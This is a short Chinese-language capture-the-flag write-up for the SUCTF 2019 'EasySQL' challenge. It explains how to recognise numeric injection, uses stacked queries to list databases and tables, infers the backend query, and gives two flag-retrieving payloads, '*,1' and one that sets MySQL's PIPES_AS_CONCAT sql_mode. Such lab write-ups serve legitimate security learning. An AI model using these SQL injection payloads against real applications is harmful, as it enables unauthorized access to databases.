[SUCTF 2019]EasySQL

输入1、1a、2-1简单判断为数字型注入。
select、order by这些基本被过滤。
考虑了下堆叠注入。

1;show databases;

1;show tables;

想要查看flag表结构,但flag应该是被过滤了。

1;desc flag;

这里比较有意思的是无论输入什么数字，返回结果都是array[0]—>1。
所以可以猜测后端语句如下：

select $_GET['query'] || xxx from xxxx

a||b，非0即1，符合猜测语句。

payload：*,1
写入后即：select *,1||xxx from xxxx

得到flag。

网上还有一个预编译解法

在oracle 缺省支持 通过 ‘ || ’ 来实现字符串拼接，但在mysql 缺省不支持。需要调整mysql 的sql_mode模式：pipes_as_concat 来实现oracle 的一些功能

payload:1;set sql_mode=PIPES_AS_CONCAT;select 1
写入后：select 1;set sql_mode=PIPES_AS_CONCAT;select 1||xxx from xxxx